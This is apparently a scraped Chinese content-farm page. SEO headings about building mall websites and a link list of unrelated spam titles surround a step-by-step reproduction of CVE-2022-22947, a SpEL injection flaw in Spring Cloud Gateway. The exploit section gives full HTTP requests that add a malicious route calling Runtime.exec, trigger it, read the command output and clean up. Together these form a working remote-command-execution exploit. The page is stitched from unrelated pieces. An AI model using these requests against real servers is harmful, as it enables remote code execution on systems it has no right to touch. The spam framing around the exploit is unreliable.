当前位置: 首页 > news >正文

个人如何做微商城网站设计沈阳网站制作公司

个人如何做微商城网站设计,沈阳网站制作公司,做网站记者的出路是什么,成功的营销型网站案例Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: https://tanzu.vmware.c…

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

参考链接:

https://tanzu.vmware.com/security/cve-2022-22947
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans

1.首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
}

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

最后,发送如下数据包清理现场,删除所添加的路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

http://www.ritt.cn/news/18985.html

相关文章:

  • 如何选择建设网站类型免费外链发布平台
  • 动态手机网站怎么做优化大师tv版
  • 电子商务网站设计的基本流程软文形式推广产品
  • wordpress企业网站免费的网络推广渠道
  • 网站建设 运维 管理包括哪些网络营销成功的案例分析
  • 沈阳京科医院宁波seo网站排名优化公司
  • 网站开源程序企业推广软文范文
  • 网站里可以增加网址吗比百度还强大的搜索引擎
  • 哪个网站做公司业务广告效果好百度指数怎么算
  • 网站建设课设报告百度怎么打广告
  • 网站制作动态转静态怎么做北京网络推广
  • 网站建设 个人宁波seo教程推广平台
  • 李洋网络做网站2023年度最火关键词
  • 哪里有做网站企业个人博客网页制作
  • 政务网站无障碍建设淘宝直通车
  • 有专业做网站优化的吗今日冯站长之家
  • 马鞍山网站开发流程杭州百度推广优化排名
  • 网站建设制作首页流程线上营销的方式
  • 杭州网站推广怎样做代做百度关键词排名
  • wap网站做视频直播网站注册查询
  • 宝塔建站网址网站seo优化心得
  • 个人网站做淘宝客福州网站seo优化公司
  • 韩国网站naver官网友情链接有用吗
  • 邯郸有没有专门做写字楼的网站一个新品牌如何推广
  • 更改网站名字焦作seo公司
  • 网站内容管理后台系统怎么做友情链接怎么做
  • 网站优化图片目前最新的营销方式有哪些
  • 建设网站 注册与登陆青岛网站推广公司排名
  • 深圳做网站的好公司win7优化大师免安装版
  • 家具网站开发设计论文设计网站logo